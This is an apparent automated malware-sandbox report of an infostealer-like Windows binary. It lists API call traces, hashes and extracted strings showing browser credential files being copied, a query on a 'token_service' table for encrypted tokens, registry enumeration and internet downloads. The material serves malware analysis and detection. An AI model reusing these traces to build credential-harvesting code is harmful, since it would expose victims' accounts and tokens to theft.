                      • Instruction ID: 589107ec55b5f964505cbd4c48757d250aba4e2f89601b640f9dfdb674060e38
                      • Opcode Fuzzy Hash: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                      • Instruction Fuzzy Hash: 4C5140B5A40218AFEB24DF90DC85BEE7779EF44705F0080A9A609A71C0DBB47A85CF95
                      APIs
                      • memset.MSVCRT ref: 04114FEE
                        • Part of subcall function 04119047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 04119072
                      • lstrcat.KERNEL32(?,00000000), ref: 04115017
                      • lstrcat.KERNEL32(?,00421000), ref: 04115034
                        • Part of subcall function 04114B77: wsprintfA.USER32 ref: 04114B93
                        • Part of subcall function 04114B77: FindFirstFileA.KERNEL32(?,?), ref: 04114BAA
                      • memset.MSVCRT ref: 0411507A
                      • lstrcat.KERNEL32(?,00000000), ref: 041150A3
                      • lstrcat.KERNEL32(?,00421020), ref: 041150C0
                        • Part of subcall function 04114B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 04114BD8
                        • Part of subcall function 04114B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 04114BEE
                        • Part of subcall function 04114B77: FindNextFileA.KERNEL32(000000FF,?), ref: 04114DE4
                        • Part of subcall function 04114B77: FindClose.KERNEL32(000000FF), ref: 04114DF9
                      • memset.MSVCRT ref: 04115106
                      • lstrcat.KERNEL32(?,00000000), ref: 0411512F
                      • lstrcat.KERNEL32(?,00421038), ref: 0411514C
                        • Part of subcall function 04114B77: wsprintfA.USER32 ref: 04114C17
                        • Part of subcall function 04114B77: StrCmpCA.SHLWAPI(?,004208D2), ref: 04114C2C
                        • Part of subcall function 04114B77: wsprintfA.USER32 ref: 04114C49
                        • Part of subcall function 04114B77: PathMatchSpecA.SHLWAPI(?,?), ref: 04114C85
                        • Part of subcall function 04114B77: lstrcat.KERNEL32(?,0064A524), ref: 04114CB1
                        • Part of subcall function 04114B77: lstrcat.KERNEL32(?,00420FF8), ref: 04114CC3
                        • Part of subcall function 04114B77: lstrcat.KERNEL32(?,?), ref: 04114CD7
                        • Part of subcall function 04114B77: lstrcat.KERNEL32(?,00420FFC), ref: 04114CE9
                        • Part of subcall function 04114B77: lstrcat.KERNEL32(?,?), ref: 04114CFD
                        • Part of subcall function 04114B77: CopyFileA.KERNEL32(?,?,00000001), ref: 04114D13
                        • Part of subcall function 04114B77: DeleteFileA.KERNEL32(?), ref: 04114D98
                      • memset.MSVCRT ref: 04115192
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                      • String ID:
                      • API String ID: 4017274736-0
                      • Opcode ID: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                      • Instruction ID: 6414c16ec083cebe79b495b988548990bca4bf0153c53c98941f6a012e6a0d8b
                      • Opcode Fuzzy Hash: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                      • Instruction Fuzzy Hash: C241D579A4021477EB14F7B0EC86FD93738AF24705F4044A4A689660D0EFF967C88B96
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0064A360,00000000,?,00420E2C,00000000,?,00000000), ref: 04118397
                      • RtlAllocateHeap.NTDLL(00000000), ref: 0411839E
                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 041183BF
                      • __aulldiv.LIBCMT ref: 041183D9
                      • __aulldiv.LIBCMT ref: 041183E7
                      • wsprintfA.USER32 ref: 04118413
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                      • String ID: @
                      • API String ID: 2774356765-2766056989
                      • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                      • Instruction ID: 7a51857a064e0bb8ec0097e439f22a2b5a5ba4bcca06d9c765420d738af0e180
                      • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                      • Instruction Fuzzy Hash: 2D2160B1E44258ABEB00DFD4DC89FAEB7B9FB44B04F104519F605BB6C0D77869018BA5
                      APIs
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                        • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                      • lstrlenA.KERNEL32(00000000), ref: 0040BC9F
                        • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
                      • lstrlenA.KERNEL32(00000000), ref: 0040BDA5
                      • lstrlenA.KERNEL32(00000000), ref: 0040BDB9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                      • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                      • API String ID: 1440504306-1079375795
                      • Opcode ID: e48e84e6f1486d8ba50a0cdb3c0cd757fbc5611cf4882342abc0ad7366da6166
                      • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                      • Opcode Fuzzy Hash: e48e84e6f1486d8ba50a0cdb3c0cd757fbc5611cf4882342abc0ad7366da6166
                      • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitProcess$DefaultLangUser
                      • String ID: B
                      • API String ID: 1494266314-2248957098
                      • Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                      • Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
                      • Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                      • Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96
                      APIs
                      • memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                        • Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
                        • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                        • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                        • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                        • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      • memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
                      • memset.MSVCRT ref: 00409EE8
                      • LocalAlloc.KERNEL32(00000040,?), ref: 00409F41
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                      • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                      • API String ID: 1977917189-1096346117
                      • Opcode ID: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                      • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                      • Opcode Fuzzy Hash: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                      • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
                      APIs
                        • Part of subcall function 04107537: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 041075A1
                        • Part of subcall function 04107537: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 04107618
                        • Part of subcall function 04107537: StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 04107674
                        • Part of subcall function 04107537: GetProcessHeap.KERNEL32(00000000,?), ref: 041076B9
                        • Part of subcall function 04107537: HeapFree.KERNEL32(00000000), ref: 041076C0
                      • lstrcat.KERNEL32(0064A668,004217FC), ref: 0410786D
                      • lstrcat.KERNEL32(0064A668,00000000), ref: 041078AF
                      • lstrcat.KERNEL32(0064A668,00421800), ref: 041078C1
                      • lstrcat.KERNEL32(0064A668,00000000), ref: 041078F6
                      • lstrcat.KERNEL32(0064A668,00421804), ref: 04107907
                      • lstrcat.KERNEL32(0064A668,00000000), ref: 0410793A
                      • lstrcat.KERNEL32(0064A668,00421808), ref: 04107954
                      • task.LIBCPMTD ref: 04107962
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                      • String ID:
                      • API String ID: 2677904052-0
                      • Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                      • Instruction ID: 1697f2d3d4af9084d96d84c18e43a8b349107279e62502dd282c708503bd8a93
                      • Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                      • Instruction Fuzzy Hash: 89313979A40109AFDB08FBE0DDD4DBE777AEB85305B10A118E116A72A0DB74F942CB61
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
                      • HeapAlloc.KERNEL32(00000000), ref: 00404FD1
                      • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
                      • InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
                      • memcpy.MSVCRT(00000000,?,00000001), ref: 0040508A
                      • InternetCloseHandle.WININET(00415EDB), ref: 004050B9
                      • InternetCloseHandle.WININET(?), ref: 004050C6
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                      • String ID:
                      • API String ID: 3894370878-0
                      • Opcode ID: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                      • Instruction ID: cb0899809939a0b3ab7ef321ba077ef70f04c27eec1e373fde9f1e9505320bf0
                      • Opcode Fuzzy Hash: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                      • Instruction Fuzzy Hash: 2A3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9F709B7281C7746AC58F99
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 04105231
                      • RtlAllocateHeap.NTDLL(00000000), ref: 04105238
                      • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 04105251
                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 04105278
                      • InternetReadFile.WININET(?,?,00000400,00000000), ref: 041052A8
                      • memcpy.MSVCRT(00000000,?,00000001), ref: 041052F1
                      • InternetCloseHandle.WININET(?), ref: 04105320
                      • InternetCloseHandle.WININET(?), ref: 0410532D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                      • String ID:
                      • API String ID: 1008454911-0
                      • Opcode ID: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                      • Instruction ID: d1a3e369954b61bce9da36a764b0e4e2b2ef74c3897144a1d315d06711da9007
                      • Opcode Fuzzy Hash: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                      • Instruction Fuzzy Hash: 663119B4A40218EBDB20CF94DD84BDCB7B5EF48704F5081D9F609A7280D7B06AC58F58
                      APIs
                        • Part of subcall function 0411AA87: lstrlen.KERNEL32(0410516C,?,?,0410516C,00420DDE), ref: 0411AA92
                        • Part of subcall function 0411AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0411AAEC
                        • Part of subcall function 0411A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0411A9EF
                      • StrCmpCA.SHLWAPI(00000000,004210C8,00000000), ref: 041158AB
                      • StrCmpCA.SHLWAPI(00000000,004210D0), ref: 04115908
                      • StrCmpCA.SHLWAPI(00000000,004210E0), ref: 04115ABE
                        • Part of subcall function 0411AA07: lstrcpy.KERNEL32(?,00000000), ref: 0411AA4D
                        • Part of subcall function 04115457: StrCmpCA.SHLWAPI(00000000,0042108C), ref: 0411548F
                        • Part of subcall function 0411AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0411AB6C
                        • Part of subcall function 04115527: StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 0411557F
                        • Part of subcall function 04115527: lstrlen.KERNEL32(00000000), ref: 04115596
                        • Part of subcall function 04115527: StrStrA.SHLWAPI(00000000,00000000), ref: 041155CB
                        • Part of subcall function 04115527: lstrlen.KERNEL32(00000000), ref: 041155EA
                        • Part of subcall function 04115527: strtok.MSVCRT(00000000,?), ref: 04115605
                        • Part of subcall function 04115527: lstrlen.KERNEL32(00000000), ref: 04115615
                      • StrCmpCA.SHLWAPI(00000000,004210D8,00000000), ref: 041159F2
                      • StrCmpCA.SHLWAPI(00000000,004210E8,00000000), ref: 04115BA7
                      • StrCmpCA.SHLWAPI(00000000,004210F0), ref: 04115C73
                      • Sleep.KERNEL32(0000EA60), ref: 04115C82
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpylstrlen$Sleepstrtok
                      • String ID:
                      • API String ID: 3630751533-0
                      • Opcode ID: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                      • Instruction ID: 0b502a016aedca4e6d5d075c1508e67d0e8bf1166d1ee1f389f4fdd9931745d7
                      • Opcode Fuzzy Hash: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                      • Instruction Fuzzy Hash: 93E17171941208ABEB08FBA0EDD1EED7B79AF95344F40817DA40A620B0EF757B48CB51
                      APIs
                      • memset.MSVCRT ref: 0410158E
                        • Part of subcall function 04101507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0410151B
                        • Part of subcall function 04101507: RtlAllocateHeap.NTDLL(00000000), ref: 04101522
                        • Part of subcall function 04101507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 0410153E
                        • Part of subcall function 04101507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 0410155C
                        • Part of subcall function 04101507: RegCloseKey.ADVAPI32(?), ref: 04101566
                      • lstrcat.KERNEL32(?,00000000), ref: 041015B6
                      • lstrlen.KERNEL32(?), ref: 041015C3
                      • lstrcat.KERNEL32(?,004262E4), ref: 041015DE
                        • Part of subcall function 0411A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0411A9EF
                        • Part of subcall function 0411AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0411AC2C
                        • Part of subcall function 0411AC17: lstrcpy.KERNEL32(00000000), ref: 0411AC6B
                        • Part of subcall function 0411AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0411AC79
                        • Part of subcall function 0411AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0411AB6C
                        • Part of subcall function 04118DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,04101660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 04118DED
                        • Part of subcall function 0411AB87: lstrcpy.KERNEL32(00000000,?), ref: 0411ABD9
                        • Part of subcall function 0411AB87: lstrcat.KERNEL32(00000000), ref: 0411ABE9
                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 041016CC
                        • Part of subcall function 0411AA07: lstrcpy.KERNEL32(?,00000000), ref: 0411AA4D
                        • Part of subcall function 04109C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 04109C53
                        • Part of subcall function 04109C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 04109C78
                        • Part of subcall function 04109C27: LocalAlloc.KERNEL32(00000040,?), ref: 04109C98
                        • Part of subcall function 04109C27: ReadFile.KERNEL32(000000FF,?,00000000,041016F6,00000000), ref: 04109CC1
                        • Part of subcall function 04109C27: LocalFree.KERNEL32(041016F6), ref: 04109CF7
                        • Part of subcall function 04109C27: CloseHandle.KERNEL32(000000FF), ref: 04109D01
                      • DeleteFileA.KERNEL32(00000000), ref: 04101756
                      • memset.MSVCRT ref: 0410177D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                      • String ID:
                      • API String ID: 3885987321-0
                      • Opcode ID: 65992f5c161543344b7d7a67b9e28a0d0697389c6807308598fc34cd9fe59a0c
                      • Instruction ID: a32f048a50e8eb6ffc61f6845324878daf595c5a3c8d46a3f99893b5d2279370
                      • Opcode Fuzzy Hash: 65992f5c161543344b7d7a67b9e28a0d0697389c6807308598fc34cd9fe59a0c
                      • Instruction Fuzzy Hash: 52515DB1950218ABDB19FB60DDD1FED7B7CAF54204F4041A9A60E620A0EF706B89CF55
                      APIs
                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                      • wsprintfA.USER32 ref: 00418459
                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                      • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                      • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                      • RegQueryValueExA.ADVAPI32(00000000,0254CFA8,00000000,000F003F,?,00000400), ref: 004184EC
                      • lstrlenA.KERNEL32(?), ref: 00418501
                      • RegQueryValueExA.ADVAPI32(00000000,0254CFD8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
                      • RegCloseKey.ADVAPI32(00000000), ref: 00418608
                      • RegCloseKey.ADVAPI32(00000000), ref: 0041861A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                      • String ID: %s\%s
                      • API String ID: 3896182533-4073750446
                      • Opcode ID: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                      • Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
                      • Opcode Fuzzy Hash: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                      • Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4
                      APIs
                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04104A51
                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04104A68
                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04104A7F
                      • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 04104AA0
                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 04104AB0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ??2@$CrackInternetlstrlen
                      • String ID: <
                      • API String ID: 1683549937-4251816714
                      • Opcode ID: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                      • Instruction ID: 9cec00b4012d78a5c4381f6edb70a6741ca4a698820154b8604be4faa5abc132
                      • Opcode Fuzzy Hash: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                      • Instruction Fuzzy Hash: 82213BB5D00219ABDF14DFA4E849AED7B75FF44321F108225E925A72D0EB706A05CF91
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
                      • HeapAlloc.KERNEL32(00000000), ref: 004176AB
                      • RegOpenKeyExA.ADVAPI32(80000002,0251A208,00000000,00020119,00000000), ref: 004176DD
                      • RegQueryValueExA.ADVAPI32(00000000,0254CF30,00000000,00000000,?,000000FF), ref: 004176FE
                      • RegCloseKey.ADVAPI32(00000000), ref: 00417708
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                      • String ID: Windows 11
                      • API String ID: 3466090806-2517555085
                      • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                      • Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
                      • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                      • Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0411790B
                      • RtlAllocateHeap.NTDLL(00000000), ref: 04117912
                      • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00000000), ref: 04117944
                      • RegQueryValueExA.ADVAPI32(00000000,0064A434,00000000,00000000,?,000000FF), ref: 04117965
                      • RegCloseKey.ADVAPI32(00000000), ref: 0411796F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID: Windows 11
                      • API String ID: 3225020163-2517555085
                      • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                      • Instruction ID: 09fc9c607e1fa1b7b5d9335a706b6bba2b941e3f759b25122f787ae37715e613
                      • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                      • Instruction Fuzzy Hash: 2E012CBDA80208BBEB00DBE0ED89FADB7B9EB48701F005155BA0596290D774A944CB51
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
                      • HeapAlloc.KERNEL32(00000000), ref: 0041773B
                      • RegOpenKeyExA.ADVAPI32(80000002,0251A208,00000000,00020119,004176B9), ref: 0041775B
                      • RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
                      • RegCloseKey.ADVAPI32(004176B9), ref: 00417784
                      Strings
